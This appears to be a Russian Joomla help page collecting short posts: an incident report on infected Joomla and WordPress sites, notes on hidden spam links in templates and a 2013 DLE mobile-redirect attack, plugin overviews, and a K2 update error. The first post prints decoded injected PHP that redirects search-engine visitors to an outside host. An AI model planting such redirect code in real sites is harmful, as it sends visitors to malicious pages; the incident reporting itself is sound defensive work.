Заражены два сайта. Один на Joomal 2.5, другой на WordPress. Оба сайта лежат на одном хостинг-аккаунте. Вредоносный скрипт внедрен во все php файлы по одному или несколько раз:
Расшифрованный он выглядит так:
error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){ if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){ header("Location: http://oeprfa.ddns.me.uk/"); exit(); } } } } }
Поговорим про левые ссылки в шаблонах Joomla. Как правило, в любой качественный платный шаблон выложенный в свободном доступе внедряется код содержащий ссылки на левые сайты. Ссылки могут быть в видимых блоках, могут быть в невидимых, могут быть в блоках которые смещены вправо или влево на несколько тысяч пикселей.
Последнее время способы внедрения и маскировки ссылок становятся все изощреннее.
В первых числах 2013 года используя уязвимость CMS DLE на многие сайты был внедрен вредоносный код.
Указанный код при захождении на сайт с мобильного устройства перенаправлял пользователя на сайт злоумышленника (Location: http://statuses.ws/), откуда скачивалось вредоносное программное обеспечение под видом обновления браузера.
При установке указанного ПО на телефоны iPhone, Android, BlackBerry и др. списывались деньги со счетов путем отправления платных СМС.
В этом уроке рассмотрим плагин от нашего разработчика под названием soccomments.
Данный плагин позволяет во вкладках вывести комментарии от Вконтакте, Facebook и jcomments.
Из урока вы узнаете какую пользу несут социальные комментарии и увидите подробную настройку данного плагина и социальных сетей.
Плагин от того же разработчика, что и социальные комментарии.
Позволяет выводить все русские (имеющие представительство в России) кнопки социальных сетей. Благодаря этим кнопкам пользователь за 1 секунду может поблагодарить и поделиться вашим материалом.
После обновления компонента K2 на Joomla! 2.5.7 видим следующую надпись в панели управления:
Model class cpanelModelCpanel not found in file
Ошибку разработчики обещают исправить. (еще ссылка).
Кроме этой надписи других проблем с сайтом не возникает. Тем не менее сайт был откачен. Ждем новую исправленную версию.